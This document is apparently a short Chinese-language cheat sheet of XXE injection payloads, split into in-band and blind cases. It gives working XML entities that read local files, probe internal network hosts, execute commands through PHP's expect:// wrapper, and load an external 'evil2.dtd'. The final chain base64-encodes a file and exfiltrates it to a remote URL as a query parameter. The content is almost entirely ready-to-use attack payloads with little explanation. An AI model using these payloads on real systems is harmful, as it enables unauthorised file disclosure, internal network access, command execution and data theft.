有回显

  • 读文件

    1. <?xml version = "1.0"?>
    2. <!DOCTYPE ANY [
    3. <!ENTITY xxe SYSTEM "file:///d://test.txt">
    4. ]>
    5. <x>&xxe;</x>

  • 内网探针或攻击内网应用(触发漏洞地址)实际应用场景几乎碰不到

该漏洞的触发有以下几个前提条件:
①内网IP地址
②开放端口
③存在XXE漏洞
④构造漏洞地址

  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE foo [
  3. <!ELEMENT foo ANY >
  4. <!ENTITY rabbit SYSTEM "http://192.168.80.1:80/test.txt" >
  5. ]>
  6. <x>&rabbit;</x>
  • RCE 实际应用场景几乎碰不到

该 CASE 是在安装 expect 扩展的 PHP 环境里执行系统命令

  1. <?xml version = "1.0"?>
  2. <!DOCTYPE ANY [
  3. <!ENTITY xxe SYSTEM "expect://id" >
  4. ]>
  5. <x>&xxe;</x>

  • 引入外部实体 DTD

    1. <?xml version="1.0" ?>
    2. <!DOCTYPE test [
    3. <!ENTITY % file SYSTEM "http://127.0.0.1:80/evil2.dtd">
    4. %file;
    5. ]>
    6. <x>&send;</x>
    1. <!ENTITY send SYSTEM "file:///d:/test.txt">

    无回显

  • 读文件

    1. <?xml version="1.0"?>
    2. <!DOCTYPE test [
    3. <!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
    4. <!ENTITY % dtd SYSTEM "http://127.0.0.1:80/evil2.dtd">
    5. %dtd;
    6. %send;
    7. ]>
    1. <!ENTITY % payload
    2. "<!ENTITY &#x25; send SYSTEM 'http://127.0.0.1:80/?data=%file;'>"
    3. >
    4. %payload;